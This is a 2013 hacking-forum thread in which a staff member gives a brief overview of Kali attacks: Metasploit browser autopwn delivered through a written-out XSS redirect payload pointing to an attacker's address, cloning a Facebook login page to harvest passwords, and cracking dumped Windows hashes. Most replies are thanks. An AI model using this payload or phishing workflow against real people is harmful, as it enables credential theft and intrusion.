1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

TUTORIAL - Exploitation

Discussion in 'Exploitation' started by Witranx, Apr 1, 2013.

  1. Witranx

    Witranx Staff Member

    Joined:
    Mar 25, 2013
    Messages:
    27
    Likes Received:
    21
    Introduction;

    In this Kali tutorial, we will use Kali tools to exploit a remote system and learn how the exploitation framework can be used with the privilege escalation tool John the Ripper to crack passwords and gain access to a remote Windows system.

    Metasploit Armitage;

    Metasploit Armitage is the GUI version of the famous Metasploit framework. In this part , we will look at the browser autopwn exploit for Windows XP using Metasploit Armitage.

    Features of this attack:
    1. Use of the auxiliary module of Metasploit Armitage.
    2. Around 22 exploit modules used to carry out the attack
    3. Use of the social engineering approach
    4. Auto-migration to notepad.exe from the browser process
    For this exploit, you need a site with a cross-site scripting (XSS) URL redirection vulnerability. The victim clicks on a particular URL in the browser, which spawns a meterpreter shell in the victim’s system. The URL redirection code will look something like:

    Code:
    http://vulnerablesite?c="><meta HTTPEQUIV="REFRESH" content="0; url=http://attackerIPaddress ">
    The auto-migration feature is used to spawn the exploit into a new process, because if the exploit is not migrated, the whole attack will terminate when the user closes the browser. Migration is therefore done automatically to maintain prolonged access.

    Social-Engineer Toolkit

    In this Kali , I will discuss a type of attack called tab nabbing. In this attack, the victim opens a link in a browser, but as soon as he changes to another tab, the original page is replaced with a fake page, which allows attacker(s) to gain the victim’s login credentials. The victim is duped into entering his username and password on a fake site.
    In this “social engineering” attack, we choose a website attack vector and the option to clone the website. We specify the site to clone, whose login credentials we desire to obtain. I have cloned Facebook in this Kali guide for demonstration purposes only*. Please note that cloning will not occur if you are not connected to the Internet during the process.

    [​IMG]

    A fake Facebook login page created by the Social Engineer Toolkit based on options set
    by the attacker.
    [​IMG]
    POST Data captured by the Social Engineer Toolkit framework from a fake Facebook login page.
    Privilege Escalation tools
    We may not always gain administrator or superuser access to a remote system. As an attacker, we need maximum privileges on the target to execute our payloads and perform desired actions. Kali offers a wide range of privilege escalation tools to meet these needs, as shown in Figure 5 of this Kali guide.
    John the Ripper;
    Once the victim has been compromised (please refer to above articles on SET and MsF for more details), the password cracker John the Ripper can be used to crack the Windows hashes to escalate privileges and gain administrator rights to the system.
    After exploitation, the hashes are dumped to a text file, and this text file is supplied to John the Ripper. John the Ripper is a very effective tool for cracking password hashes of remote systems once the hashes are available. The attack demonstrated in this Kali guide can be carried out with either the Metasploit Framework or the Social Engineer Toolkit.

    With these passwords in hand, we can now escalate our privileges on the target system.

    It is evident from this guide that Kali and a crafty attacker can make maximum use of these tools, and combine them to maximize his benefits. This Kali guide highlights the most important exploitation and privilege escalation tools. In the Kali guides to come, I will cover some more exploitation and privilege escalation techniques.



     
    #1
    wlan0 and DarkSolo like this.
  2. DarkSolo

    DarkSolo Staff Member

    Joined:
    Mar 14, 2013
    Messages:
    199
    Likes Received:
    49
    Good job !
     
    #2
    Witranx likes this.
  3. Witranx

    Witranx Staff Member

    Joined:
    Mar 25, 2013
    Messages:
    27
    Likes Received:
    21
    #3
  4. danlix

    danlix New Member

    Joined:
    Apr 14, 2013
    Messages:
    4
    Likes Received:
    0
  5. Lotfi

    Lotfi New Member

    Joined:
    Apr 24, 2013
    Messages:
    8
    Likes Received:
    0
    many thanks
     
    #5
  6. WarLock

    WarLock New Member

    Joined:
    Apr 27, 2013
    Messages:
    1
    Likes Received:
    0
    what the same step exploit in backtrack and kali ?
     
    #6
  7. José Brito

    José Brito New Member

    Joined:
    Apr 29, 2013
    Messages:
    3
    Likes Received:
    0
    Thanks a lot for this tutorial ;)
     
    #7
  8. St3altH

    St3altH New Member

    Joined:
    May 11, 2013
    Messages:
    3
    Likes Received:
    1
    sorry...nice summary, but where is the tutorial ?
    Tx
     
    #8
    leon kilat likes this.
  9. IT-HACKERs

    IT-HACKERs New Member

    Joined:
    May 12, 2013
    Messages:
    1
    Likes Received:
    0
    matur suwun....mbah...
     
    #9
  10. hDNA

    hDNA New Member

    Joined:
    May 22, 2013
    Messages:
    4
    Likes Received:
    0
    GOOD JOB
     
    #10
  11. dragon

    dragon New Member

    Joined:
    May 31, 2013
    Messages:
    11
    Likes Received:
    1
    bro Thanks share :) this tutorial
     
    #11
  12. fareezizwar

    fareezizwar New Member

    Joined:
    Apr 16, 2013
    Messages:
    10
    Likes Received:
    1
    Thank share ;)
     
    #12
  13. Crius

    Crius New Member

    Joined:
    Aug 17, 2013
    Messages:
    7
    Likes Received:
    0
    thanks for the share! very informative! ...
     
    #13
  14. leon kilat

    leon kilat New Member

    Joined:
    Sep 20, 2013
    Messages:
    4
    Likes Received:
    0
    yeah, where is the tutorial?
     
    #14
  15. #KILLC0D3

    #KILLC0D3 New Member

    Joined:
    Feb 6, 2014
    Messages:
    8
    Likes Received:
    0
    nice one bto :) thnkx
     
    #15
  16. rEvolt!

    rEvolt! New Member

    Joined:
    Mar 12, 2014
    Messages:
    12
    Likes Received:
    0
    Nice Sharing bro :D But I want to know how to change our ip to DNS
    Can i use like tinyurl.com ?
     
    #16
  17. NY-Freaks

    NY-Freaks New Member

    Joined:
    May 30, 2014
    Messages:
    3
    Likes Received:
    1
    cool...
     
    #17

Share This Page